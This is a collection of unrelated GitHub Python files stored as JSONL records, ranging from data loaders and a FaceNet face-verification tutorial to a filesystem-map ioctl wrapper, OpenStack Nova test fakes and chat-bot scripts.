onwards\n\nprint(\"oRoot.print_all_1()\")\noRoot.print_all_1()\n\nprint(\"oRoot.print_all_2()\")\noRoot.print_all_2()","repo_name":"jsaylor525/puzzle-solutions","sub_path":"python_coding_examples/question_11.py","file_name":"question_11.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70535354338","text":"# encoding = utf-8\n# author = xy\n\nfrom data_pre import wfqd\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils import data\nimport utils\nimport pickle\n\n\ndef load_w2v(embedding_path):\n \"\"\" load embedding vector \"\"\"\n embedding_np = np.load(embedding_path)\n return embedding_np\n\n\ndef load_data(df_file, vocab_path, q_max_len=30, p_max_len=500, a_max_len=5):\n \"\"\"\n load data from .csv\n # 1. load\n # 2. index, tag(词性), 是否在答案中出现, 是否是标题\n # 3. padding\n return: content, question, zhengli, fuli, wfqd, answer\n \"\"\"\n\n # load\n df = pd.read_csv(df_file)\n querys = df['query'].values.tolist()\n passages = df['passage'].values.tolist()\n zhenglis = df['zhengli'].values.tolist()\n fulis = df['fuli'].values.tolist()\n wfqds = df['wfqd'].values.tolist()\n wfqd_list = wfqd.wfqd_list\n\n if 'answer' in df:\n answers = df['answer'].values.tolist()\n answers_tmp = []\n for answer, zhengli, fuli in zip(answers, zhenglis, fulis):\n if answer.strip() == zhengli:\n answers_tmp.append(0)\n elif answer.strip() == fuli:\n answers_tmp.append(1)\n elif answer.strip() in wfqd_list:\n answers_tmp.append(2)\n else:\n print('load_data, meet wrong data, answer:%s, zhengli:%s, fuli:%s' % (answer, zhengli, fuli))\n\n # words\n p_index = [utils.split_word(pp) for pp in passages]\n q_index = [utils.split_word(qq) for qq in querys]\n zhengli_index = [utils.split_word(zhengli) for zhengli in zhenglis]\n fuli_index = [utils.split_word(fuli) for fuli in fulis]\n wfqd_index = [utils.split_word(w) for w in wfqds]\n\n # words -> index\n q_index = utils.words2index(q_index, vocab_path)\n p_index = utils.words2index(p_index, vocab_path)\n zhengli_index = utils.words2index(zhengli_index, vocab_path)\n fuli_index = utils.words2index(fuli_index, vocab_path)\n wfqd_index = utils.words2index(wfqd_index, vocab_path)\n\n # padding\n q_index = utils.pad(q_index, q_max_len)\n p_index = utils.pad(p_index, p_max_len)\n zhengli_index = utils.pad(zhengli_index, a_max_len)\n fuli_index = utils.pad(fuli_index, a_max_len)\n wfqd_index = utils.pad(wfqd_index, a_max_len)\n\n if 'answer' in df:\n return [p_index, q_index, zhengli_index, fuli_index, wfqd_index, answers_tmp]\n else:\n return [p_index, q_index, zhengli_index, fuli_index. wfqd_index]\n\n\ndef build_loader(dataset, batch_size, shuffle, drop_last):\n \"\"\"\n build data loader\n return: a instance of Dataloader\n \"\"\"\n # dataset = [torch.LongTensor(d) for d in dataset]\n # dataset = data.TensorDataset(*dataset)\n data_iter = data.DataLoader(\n dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n drop_last=drop_last\n )\n return data_iter\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xy09Player/rd_opinion","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1753151760","text":"import pandas as pd\n\ndf = pd.read_csv('dirtydata.csv')\n\ndf.loc[7,'Duration'] = 45\nprint(df.to_string())\n\n\n#Loop through all values in the \"Duration\" column.\nfor x in df.index:\n if df.loc[x, \"Duration\"] > 120:\n df.loc[x, \"Duration\"] = 120\n\nprint(df.to_string())\n\n###Removing Rows\nfor x in df.index:\n if df.loc[x, \"Duration\"] > 120:\n df.drop(x, inplace = True)\n\n#remember to include the 'inplace = True' argument to make the changes in the original DataFrame object instead of returning a copy\n\nprint(df.to_string())\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sayeed007/PythonProgramming","sub_path":"Pandas/9_Fixing Wrong Data.py","file_name":"9_Fixing Wrong Data.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17935134591","text":"from rest_framework.renderers import BaseRenderer, JSONRenderer\nfrom xmltodict import unparse\nfrom .encoders import MongoJsonEncoder\n\n\nclass PlainTextRenderer(BaseRenderer):\n media_type = 'text/plain'\n format = 'txt'\n\n def render(self, data, media_type=None, renderer_context=None):\n return str(data).encode(self.charset)\n\n\nclass XMLRenderer(BaseRenderer):\n \"\"\"\n Renderer which serializes to XML.\n \"\"\"\n media_type = 'application/xml'\n format = 'xml'\n root = 'xml'\n\n def render(self, data, accepted_media_type=None, renderer_context=None):\n \"\"\"\n Renders *obj* into serialized XML.\n \"\"\"\n if self.root:\n data = {self.root: data}\n return unparse(data).encode(self.charset)\n\n\nclass BareXMLRenderer(XMLRenderer):\n root = None\n\n\nclass MongoJsonRenderer(JSONRenderer):\n encoder_class = MongoJsonEncoder\n","repo_name":"John-yingqiang/temp","sub_path":"common/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70817640737","text":"import struct\nimport collections\nimport ioctl\nimport fcntl\nimport array\n\n# Derived from linux/fsmap.h\n_struct_fsmap_string = 'LLQQQQQQQ'\n_struct_fsmap = struct.Struct('=' + _struct_fsmap_string)\n_struct_fsmap_head_string = 'LLLLQQQQQQ' + (2 * _struct_fsmap_string)\n_struct_fsmap_head = struct.Struct('=' + _struct_fsmap_head_string)\n\nFMH_IF_VALID = 0\nFMH_OF_DEV_T = 0x1\n\nFMR_OF_PREALLOC = 0x1\nFMR_OF_ATTR_FORK = 0x2\nFMR_OF_EXTENT_MAP = 0x4\nFMR_OF_SHARED = 0x8\nFMR_OF_SPECIAL_OWNER = 0x10\nFMR_OF_LAST = 0x20\n\ndef FMR_OWNER(fstype, code):\n\treturn (fstype << 32) | (code & 0xFFFFFFFF)\ndef FMR_OWNER_TYPE(owner):\n\treturn owner >> 32\ndef FMR_OWNER_CODE(owner):\n\treturn owner & 0xFFFFFFFF\n\nFMR_OWN_FREE = FMR_OWNER(0, 1)\nFMR_OWN_UNKNOWN = FMR_OWNER(0, 2)\nFMR_OWN_METADATA = FMR_OWNER(0, 3)\n\n_FS_IOC_GETFSMAP = ioctl._IOWR(ord('X'), 59, _struct_fsmap_head)\n\nfsmap_key = collections.namedtuple('fsmap_key',\n\t\t'device flags physical owner offset')\nfsmap_rec = collections.namedtuple('fsmap_rec',\n\t\t'device flags physical owner offset length hdr_flags')\n\ndef getfsmap(fd, getfsmap_keys = None, count = 10000):\n\t'''Iterable GETFSMAP generator...'''\n\tlength = 0\n\n\t# Prepare keys\n\ttry:\n\t\tkey0 = getfsmap_keys[0]\n\texcept:\n\t\tkey0 = fsmap_key(0, 0, 0, 0, 0)\n\ttry:\n\t\tkey1 = getfsmap_keys[1]\n\texcept:\n\t\tkey1 = fsmap_key(ioctl._UINT32_MAX, ioctl._UINT32_MAX, \\\n\t\t\t\tioctl._UINT64_MAX, ioctl._UINT64_MAX, \\\n\t\t\t\tioctl._UINT64_MAX)\n\n\twhile True:\n\t\thdr = _struct_fsmap_head.pack(0, 0, count, 0, 0, 0, 0, 0, 0, 0, \\\n\t\t\t\tkey0.device, key0.flags, key0.physical, \\\n\t\t\t\tkey0.owner, key0.offset, length, 0, 0, 0, \\\n\t\t\t\tkey1.device, key1.flags, key1.physical, \\\n\t\t\t\tkey1.owner, key1.offset, 0, 0, 0, 0)\n\t\tbuf = bytearray(hdr) + bytearray(_struct_fsmap.size * count)\n\t\ttry:\n\t\t\tret = fcntl.ioctl(fd, _FS_IOC_GETFSMAP, buf)\n\t\texcept TypeError:\n\t\t\t# Turn into mutable C-level array of chars\n\t\t\ts = '%s%s' % (hdr, '\\0' * (_struct_fsmap.size * count))\n\t\t\tbuf = array.array('c', s)\n\t\t\tret = fcntl.ioctl(fd, _FS_IOC_GETFSMAP, buf)\n\t\tif ret < 0:\n\t\t\traise IOError('GETFSMAP')\n\n\t\tmeh = _struct_fsmap_head.unpack_from(buf)\n\t\toflags = meh[1]\n\t\tentries = meh[3]\n\t\tif entries == 0:\n\t\t\treturn\n\n\t\tbufsz = _struct_fsmap_head.size + (_struct_fsmap.size * entries)\n\t\tassert len(buf) >= bufsz\n\t\tfor offset in range(_struct_fsmap_head.size, bufsz, _struct_fsmap.size):\n\t\t\tx = _struct_fsmap.unpack_from(buf, offset)\n\t\t\trec = fsmap_rec(x[0], x[1], x[2], x[3], x[4], x[5], oflags)\n\t\t\tyield rec\n\n\t\tif rec.flags & FMR_OF_LAST:\n\t\t\treturn\n\t\tkey0 = rec\n\t\tlength = rec.length\n\nXFS_FMR_OWN_TYPE\t= ord('X')\nXFS_FMR_OWN_FS\t\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 1)\nXFS_FMR_OWN_LOG\t\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 2)\nXFS_FMR_OWN_AG\t\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 3)\nXFS_FMR_OWN_INOBT\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 4)\nXFS_FMR_OWN_INODES\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 5)\nXFS_FMR_OWN_REFC\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 6)\nXFS_FMR_OWN_COW\t\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 7)\nXFS_FMR_OWN_DEFECTIVE\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 8)\n\nEXT4_FMR_OWN_TYPE\t= ord('f')\nEXT4_FMR_OWN_GDT\t= FMR_OWNER(EXT4_FMR_OWN_TYPE, 1)\nEXT4_FMR_OWN_RESV_GDT\t= FMR_OWNER(EXT4_FMR_OWN_TYPE, 2)\nEXT4_FMR_OWN_BLKBM\t= FMR_OWNER(EXT4_FMR_OWN_TYPE, 3)\nEXT4_FMR_OWN_INOBM\t= FMR_OWNER(EXT4_FMR_OWN_TYPE, 4)\n\nspecial_owner_types = {\n\tXFS_FMR_OWN_TYPE:\t'xfs',\n\tEXT4_FMR_OWN_TYPE:\t'ext4',\n}\n\nspecial_owner_codes = {\n\tXFS_FMR_OWN_FS:\t\t'fsdata',\n\tXFS_FMR_OWN_LOG:\t'log',\n\tXFS_FMR_OWN_AG:\t\t'bnobt-cntbt-rmapbt',\n\tXFS_FMR_OWN_INOBT:\t'inobt',\n\tXFS_FMR_OWN_INODES:\t'inodes',\n\tXFS_FMR_OWN_REFC:\t'refcountbt',\n\tXFS_FMR_OWN_COW:\t'cow',\n\tXFS_FMR_OWN_DEFECTIVE:\t'defective',\n\tEXT4_FMR_OWN_GDT:\t'group_descriptors',\n\tEXT4_FMR_OWN_RESV_GDT:\t'reserved_gdt_blocks',\n\tEXT4_FMR_OWN_BLKBM:\t'block_bitmap',\n\tEXT4_FMR_OWN_INOBM:\t'inode_bitmap',\n}\n\ndef special_owner_name(owner):\n\t'''Formulate a name for a special owner.'''\n\tt = FMR_OWNER_TYPE(owner)\n\tc = FMR_OWNER_CODE(owner)\n\tif owner in special_owner_codes:\n\t\treturn '%s:%s' % (special_owner_types[t], \\\n\t\t\t\tspecial_owner_codes[owner])\n\treturn '%d:%d' % (t, c)\n\nif __name__ == '__main__':\n\timport sys\n\timport pprint\n\n\tif len(sys.argv) < 2:\n\t\tsys.stderr.write('No filename(s) given\\n')\n\t\tsys.exit(1)\n\n\tfor file_ in sys.argv[1:]:\n\t\twith open(file_, 'r') as fd:\n\t\t\tfor fmr in getfsmap(fd):\n\t\t\t\tpprint.pprint(fmr)\n","repo_name":"djwong/filemapper","sub_path":"getfsmap.py","file_name":"getfsmap.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"28613899319","text":"# -*- coding: utf-8 -*-\n\"\"\"\n简介:\n实现人脸识别经典算法FaceNet\n\nCreated on Fri Nov 16 14:59:31 2018\n\n@author: dell\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.layers import BatchNormalization, MaxPooling2D, AveragePooling2D\nfrom keras.layers import Dense, Flatten, Lambda, Concatenate\nfrom keras.models import Model\nfrom keras.initializers import glorot_uniform\nfrom keras.engine.topology import Layer\nfrom keras import backend as K\nimport fr_utils\nfrom inception_blocks_v2 import *\n\nK.set_image_data_format('channels_first')\n\nimport time\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom numpy import genfromtxt\n\n\ndef triplet_loss(y_true, y_pred, alpha=0.2):\n '''\n 实现FaceNet中的损失函数\n Parameters:\n y_true - true标签,\n y_pred - 列表,包含了以下参数:\n anchor - 给定的anchor图像的编码,shape=(None, 128)\n positive - positive图像的编码, shape=(None, 128)\n negative - negative图像的编码, shape=(None, 128)\n alpha - 超参数\n Returns:\n loss - 实数, 损失函数的值\n '''\n \n # step1 获取anchor, positive, negative的图像编码\n anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]\n \n # step2 计算anchor与positive之间的编码距离\n pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)), axis=-1) # 注意这里按列求和\n \n # step3 计算anchor与negative之间的编码距离\n neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)), axis=-1)\n \n # step4 计算 pos_dist - neg_dist再加上两者之间的间距alpha\n basic_loss = tf.add(tf.subtract(pos_dist, neg_dist), alpha)\n \n # step5 通过取带零的最大值和训练样本的求和来计算整个公式\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0))\n \n return loss\n\n\n#创建模型\nFaceNet = faceRecoModel(input_shape=(3, 96, 96))\n\n#开始时间\nstart_time = time.clock()\n\n#编译模型\nFaceNet.compile(optimizer = 'adam', loss = triplet_loss, metrics = ['accuracy'])\n\n#加载权值\nfr_utils.load_weights_from_FaceNet(FaceNet)\n\n#结束时间\nend_time = time.clock()\n\n#计算时差\nminium = end_time - start_time\n\nprint(\"执行了:\" + str(int(minium / 60)) + \"分\" + str(int(minium%60)) + \"秒\")\n\n \ndatabase = {}\ndatabase[\"danielle\"] = fr_utils.img_to_encoding(\"images/danielle.png\", FaceNet)\ndatabase[\"younes\"] = fr_utils.img_to_encoding(\"images/younes.jpg\", FaceNet)\ndatabase[\"tian\"] = fr_utils.img_to_encoding(\"images/tian.jpg\", FaceNet)\ndatabase[\"andrew\"] = fr_utils.img_to_encoding(\"images/andrew.jpg\", FaceNet)\ndatabase[\"kian\"] = fr_utils.img_to_encoding(\"images/kian.jpg\", FaceNet)\ndatabase[\"dan\"] = fr_utils.img_to_encoding(\"images/dan.jpg\", FaceNet)\ndatabase[\"sebastiano\"] = fr_utils.img_to_encoding(\"images/sebastiano.jpg\", FaceNet)\ndatabase[\"bertrand\"] = fr_utils.img_to_encoding(\"images/bertrand.jpg\", FaceNet)\ndatabase[\"kevin\"] = fr_utils.img_to_encoding(\"images/kevin.jpg\", FaceNet)\ndatabase[\"felix\"] = fr_utils.img_to_encoding(\"images/felix.jpg\", FaceNet)\ndatabase[\"benoit\"] = fr_utils.img_to_encoding(\"images/benoit.jpg\", FaceNet)\ndatabase[\"arnaud\"] = fr_utils.img_to_encoding(\"images/arnaud.jpg\", FaceNet)\n\ndef verify(image_path, identity, database, model):\n \"\"\"\n 对“identity”与“image_path”的编码进行验证。\n\n 参数:\n image_path -- 摄像头的图片。\n identity -- 字符类型,想要验证的人的名字。\n database -- 字典类型,包含了成员的名字信息与对应的编码。\n model -- 在Keras的模型的实例。\n\n 返回:\n dist -- 摄像头的图片与数据库中的图片的编码的差距。\n is_open_door -- boolean,是否该开门。\n \"\"\"\n #第一步:计算图像的编码,使用fr_utils.img_to_encoding()来计算。\n encoding = fr_utils.img_to_encoding(image_path, model)\n\n #第二步:计算与数据库中保存的编码的差距\n dist = np.linalg.norm(encoding - database[identity])\n\n #第三步:判断是否打开门\n if dist < 0.7:\n print(\"欢迎 \" + str(identity) + \"回家!\")\n is_door_open = True\n else:\n print(\"经验证,您与\" + str(identity) + \"不符!\")\n is_door_open = False\n\n return dist, is_door_open\n \n \nverify(\"images/camera_0.jpg\",\"younes\",database, FaceNet) \n \n \n","repo_name":"gear106/python_ml_code","sub_path":"FaceNet/FaceNet_keras.py","file_name":"FaceNet_keras.py","file_ext":"py","file_size_in_byte":4504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38616510950","text":"def daysinmonth(month,year):\n if month==1 or month==3 or month==5 or month==7 or month==8 or month==10 or month==12:\n day=31\n elif month==4 or month==6 or month==9 or month==11:\n day=30\n else:\n if year%400==0 and year%4==0:\n if year%100!=0:\n day=29\n else:\n day=28\n return day\n\ndef dayofweek(d, m, y): \n t = [ 0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4 ] \n y -= m < 3\n return (( y + int(y / 4) - int(y / 100) + int(y / 400) + t[m - 1] + d) % 7)\n\ny=int(input(\"Enter Year : \"))\nm=int(input(\"Enter Month (In Number) : \"))\nt=dayofweek(1,m,y)\nday=daysinmonth(m,y)\nprint(\"M\\tT\\tW\\tTh\\tF\\tS\\tS\")\na=1\nfor i in range (1,7):\n if a>day:\n break\n for j in range(1,8):\n if i==1:\n if j>=t:\n print(\"{}\\t\".format(a),end='')\n a+=1\n else:\n print(\" \\t\",end='')\n else:\n print(\"{}\\t\".format(a),end='')\n a+=1\n if(a>day):\n break\n print()","repo_name":"soumya-shome/My-Guide-to-Coding","sub_path":"Calendar_Month/Calendar_Month.py","file_name":"Calendar_Month.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74618519777","text":"import chainer\nimport shufflenet_v2\nimport chainertools\nimport cv2\nimport numpy as np\nimport time\n\n\ndef main(args):\n with chainer.using_config('train', False):\n with chainer.using_config('enable_backprop', False):\n snapshot_file = args.snapshot\n label_encoder = chainertools.openimages.openimages_label_encoder(\n \".\")\n k = shufflenet_v2.guess_k(snapshot_file)\n net = shufflenet_v2.ShuffleNetV2(k, label_encoder.num_classes())\n chainer.serializers.load_npz(\n snapshot_file, net, \"updater/model:main/predictor/\")\n if args.gpu >= 0:\n net.to_gpu(args.gpu)\n\n camera_id = -1\n camera = cv2.VideoCapture(camera_id)\n dt_filtered = 0.\n alpha = 0.1\n while True:\n success, frame = camera.read()\n if not success:\n raise RuntimeError(\"could not read frame from camera\")\n\n t0 = time.time()\n frame_small_orig = cv2.resize(frame, (224, 224))\n frame_small = cv2.cvtColor(frame_small_orig, cv2.COLOR_BGR2RGB)\n frame_small = np.transpose(frame_small, (2, 0, 1))\n input = net.xp.asarray([frame_small], dtype=np.float32)\n # print(input.shape, input)\n output = net(input)\n output = chainer.functions.sigmoid(output)\n output = chainer.cuda.to_cpu(output.data[0])\n t1 = time.time()\n\n labels_idx = np.where(output > 0.5)[0]\n readable_labels = [label_encoder.readable_label_of_encoded_label(\n lab) for lab in labels_idx]\n\n dt = t1 - t0\n dt_filtered = alpha * dt + (1 - alpha) * dt_filtered\n fps = 1. / dt_filtered\n print(\"{:.2f} fps\".format(fps))\n print(list(zip(readable_labels, output[labels_idx])))\n cv2.imshow(snapshot_file, frame)\n cv2.waitKey(1)\n\n\ndef parse_command_line():\n parser = argparse.ArgumentParser(\n description=\"Demonstration of multilabel classification with Shufflenet v2.\")\n parser.add_argument(\n '--gpu', help='Run on gpu (integer id starting at 0) or cpu (-1)', type=int, default=-1)\n parser.add_argument('--snapshot', help='Model snapshot file',\n default=\"shufflenet-v2-snapshots/x1/snapshot_iter_335305\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n import argparse\n args = parse_command_line()\n main(args)\n","repo_name":"lehy/shufflenet-v2-chainer","sub_path":"openimages/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26553848771","text":"import time\nimport uuid\n\nfrom nova.compute import task_states\nfrom nova.compute import vm_states\nfrom nova import db\nfrom nova import utils\n\n\ndef get_fake_instance_data(name, project_id, user_id):\n return {'name': name,\n 'id': 1,\n 'uuid': str(uuid.uuid4()),\n 'project_id': project_id,\n 'user_id': user_id,\n 'image_ref': \"1\",\n 'kernel_id': \"1\",\n 'ramdisk_id': \"1\",\n 'mac_address': \"de:ad:be:ef:be:ef\",\n 'instance_type':\n {'name': 'm1.tiny',\n 'memory_mb': 512,\n 'vcpus': 1,\n 'root_gb': 1024,\n 'flavorid': 1,\n 'rxtx_factor': 1}\n }\n\n\ndef get_fake_image_data(project_id, user_id):\n return {'name': 'image1',\n 'id': 1,\n 'project_id': project_id,\n 'user_id': user_id,\n 'image_ref': \"1\",\n 'kernel_id': \"1\",\n 'ramdisk_id': \"1\",\n 'mac_address': \"de:ad:be:ef:be:ef\",\n 'instance_type': 'm1.tiny',\n }\n\n\ndef get_fake_volume_info_data(target_portal, volume_id):\n return {\n 'driver_volume_type': 'iscsi',\n 'data': {\n 'volume_id': 1,\n 'target_iqn': 'iqn.2010-10.org.openstack:volume-' + volume_id,\n 'target_portal': target_portal,\n 'target_lun': 1,\n 'auth_method': 'CHAP',\n }\n }\n\n\ndef get_fake_block_device_info(target_portal, volume_id):\n return {'block_device_mapping': [{'connection_info': {\n 'driver_volume_type': 'iscsi',\n 'data': {'target_lun': 1,\n 'volume_id': volume_id,\n 'target_iqn':\n 'iqn.2010-10.org.openstack:volume-' +\n volume_id,\n 'target_portal': target_portal,\n 'target_discovered': False}},\n 'mount_device': 'vda',\n 'delete_on_termination': False}],\n 'root_device_name': None,\n 'ephemerals': [],\n 'swap': None\n }\n\n\ndef stub_out_db_instance_api(stubs):\n \"\"\"Stubs out the db API for creating Instances.\"\"\"\n\n INSTANCE_TYPES = {\n 'm1.tiny': dict(memory_mb=512, vcpus=1, root_gb=0, flavorid=1),\n 'm1.small': dict(memory_mb=2048, vcpus=1, root_gb=20, flavorid=2),\n 'm1.medium': dict(memory_mb=4096, vcpus=2, root_gb=40, flavorid=3),\n 'm1.large': dict(memory_mb=8192, vcpus=4, root_gb=80, flavorid=4),\n 'm1.xlarge': dict(memory_mb=16384, vcpus=8, root_gb=160, flavorid=5)}\n\n class FakeModel(object):\n \"\"\"Stubs out for model.\"\"\"\n\n def __init__(self, values):\n self.values = values\n\n def get(self, key, default=None):\n if key in self.values:\n return self.values[key]\n else:\n return default\n\n def __getattr__(self, name):\n return self.values[name]\n\n def __getitem__(self, key):\n return self.get(key)\n\n def __setitem__(self, key, value):\n self.values[key] = value\n\n def __str__(self):\n return str(self.values)\n\n def fake_instance_create(context, values):\n \"\"\"Stubs out the db.instance_create method.\"\"\"\n\n if 'instance_type' not in values:\n return\n\n instance_type = values['instance_type']\n\n base_options = {\n 'name': values['name'],\n 'id': values['id'],\n 'uuid': str(uuid.uuid4()),\n 'reservation_id': utils.generate_uid('r'),\n 'image_ref': values['image_ref'],\n 'kernel_id': values['kernel_id'],\n 'ramdisk_id': values['ramdisk_id'],\n 'vm_state': vm_states.BUILDING,\n 'task_state': task_states.SCHEDULING,\n 'user_id': values['user_id'],\n 'project_id': values['project_id'],\n 'launch_time': time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime()),\n 'instance_type': instance_type,\n 'memory_mb': instance_type['memory_mb'],\n 'vcpus': instance_type['vcpus'],\n 'mac_addresses': [{'address': values['mac_address']}],\n 'root_gb': instance_type['root_gb'],\n }\n return FakeModel(base_options)\n\n def fake_instance_type_get_all(context, inactive=0, filters=None):\n return INSTANCE_TYPES.values()\n\n def fake_instance_type_get_by_name(context, name):\n return INSTANCE_TYPES[name]\n\n def fake_block_device_mapping_get_all_by_instance(context, instance_uuid):\n return {}\n\n stubs.Set(db, 'instance_create', fake_instance_create)\n stubs.Set(db, 'instance_type_get_all', fake_instance_type_get_all)\n stubs.Set(db, 'instance_type_get_by_name', fake_instance_type_get_by_name)\n stubs.Set(db, 'block_device_mapping_get_all_by_instance',\n fake_block_device_mapping_get_all_by_instance)\n","repo_name":"JiYou/openstack","sub_path":"packages/source/nova/nova/tests/hyperv/db_fakes.py","file_name":"db_fakes.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"en","doc_type":"code","stars":399,"dataset":"github-code","pt":"34"} +{"seq_id":"19454118451","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\nfrom flask import Blueprint, request, redirect, flash, url_for\nfrom flask import render_template\nfrom jinja2 import TemplateNotFound\nfrom flask import abort\nfrom flask_login import (login_user, current_user, login_required, logout_user)\nfrom wechat_sdk import WechatBasic\n\n\nvaliation_app = Blueprint('valiation', __name__, template_folder='templates')\n\n\n@valiation_app.route('/jfjl_valiation', methods=['GET', 'POST'])\ndef jfjl_valiation():\n args = request.args\n token = 'jiefangjieli'\n echostr = args['echostr']\n signature = args['signature']\n timestamp = args['timestamp']\n nonce = args['nonce']\n wechat = WechatBasic(token=token)\n # 对签名进行校验\n if wechat.check_signature(signature=signature, timestamp=timestamp, nonce=nonce):\n return echostr\n else:\n return \"This is jfjl valiation!\"\n\n\n\n\n","repo_name":"qitianchan/neighbour_0.1","sub_path":"neighbour/district/valiation.py","file_name":"valiation.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36107582833","text":"#!/usr/bin/env python\n\nimport sys\nimport numpy\nfrom rios import applier\nfrom rios import fileinfo\n\ndef doMinimum(info, inputs, outputs, otherargs):\n \"Called from RIOS. Average the input files\"\n minimum = numpy.zeros(inputs.imgs[0].shape, dtype = numpy.float32)\n for img in inputs.imgs:\n img[numpy.isnan(img)] = otherargs.noDataVal\n \n imgNonNull = (img != otherargs.noDataVal)\n minNull = (minimum == otherargs.noDataVal)\n minimum[minNull] = img[minNull]\n newMin = (imgNonNull & ~minNull & (img < minimum))\n minimum[newMin] = img[newMin]\n\n\n outputs.min = minimum.astype(img.dtype)\n\ninfiles = applier.FilenameAssociations()\n# names of imput images\ninfiles.imgs = sys.argv[1:]\n\notherargs = applier.OtherInputs()\notherargs.noDataVal = float(fileinfo.ImageInfo(infiles.imgs[0]).nodataval[0])\nprint(otherargs.noDataVal)\n\n# Last name given is the output\noutfiles = applier.FilenameAssociations()\noutfiles.min = \"outfile18.img\"\ncontrols = applier.ApplierControls()\ncontrols.setFootprintType(applier.UNION)\napplier.apply(doMinimum, infiles, outfiles, otherargs, controls=controls)\n","repo_name":"jasminemuir/phd","sub_path":"create_minimage.py","file_name":"create_minimage.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"6634180886","text":"# python standard libraries\r\nimport json\r\n\r\n# dependencies\r\nfrom TwitchPy import TwitchBot\r\n\r\n# local modules\r\nimport commands\r\nimport database\r\nimport loops\r\n\r\n\r\n\r\n'''TO DO\r\n * when someone does a command like '!mock @monipoop', check whether that user exists in API or check if they're in chat?\r\n before automatically adding them to the database to avoid issues where the database is filled with 'phantom' users which\r\n are all typos.\r\n\r\n * commands still needed to add:\r\n help\r\n\r\n redeem: spending points for stuff to happen\r\n\r\n eventlist\r\n spawnevent\r\n\r\n mystery points box\r\n bid\r\n topbid\r\n\r\n lottery\r\n checklotto\r\n buytix\r\n checktix\r\n'''\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n with open('login_info.json', 'r') as file:\r\n login = json.load(file)\r\n\r\n bot = TwitchBot.Client(**login)\r\n\r\n db = database.Handler()\r\n\r\n basic = commands.Basic(bot)\r\n copypasta = commands.CopyPasta(bot.get_IRC())\r\n points = commands.Points(bot, db)\r\n\r\n bot.add_cogs([basic, copypasta, points])\r\n\r\n try:\r\n bot.run()\r\n finally:\r\n db.close()","repo_name":"rexosorous/twitch-bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36362218228","text":"import geocoder\nimport sys \nsys.path.insert(0, '/home/chingyuc/CYCFBbot')\nimport fbbot\nimport msganalyzer\nimport messenger\nimport handleuserinfo \nfrom geopy.distance import vincenty\n\n################################################################################\n\n# google geocode key\ngeokey = \"\"\ntry:\n with open('geocoder_key', 'r') as f:\n geokey = f.read().strip()\n f.close()\n assert(len(key) != 0)\nexcept:\n print(\"error in accessing geocoder key\")\n\n################################################################################\n\ndef check_start(data):\n\n '''\n The check fucntion of the start state. Check if command in data is valid. \n Return true.\n '''\n\n return True\n\n#------------------------------------------------------------------------------\n\ndef state_start(user, msg_content=None, args=None):\n\n '''\n Start state function. Send user the address of his/her favorite locations.\n Return end state.\n '''\n\n favs = {\"fav1\":\"\", \"fav2\":\"\"}\n for key in favs:\n info = handleuserinfo.get(user, key)\n if info[0] is not None and info[1] is not None:\n lat = info[0]\n lon = info[1]\n try:\n result = geocoder.google([lat, lon], method='reverse', \n key=geokey)\n addr = result.address\n favs[key] = addr\n except:\n messenger.send_text(user, \"Sorry, the google geocoder\"\n \"currently is not operating\")\n raise ImportError(\"problem using geocoder\")\n return [\"END\", None]\n\n text = \"Here's the list of your favorite locations,\\n\"\\\n \"* fav1 : \\n{favs1}\\n\"\\\n \"* fav2 : \\n{favs2}\\n\"\\\n \"\\n\".format(favs1=favs[\"fav1\"], favs2=favs[\"fav2\"])\n messenger.send_text(user, text)\n 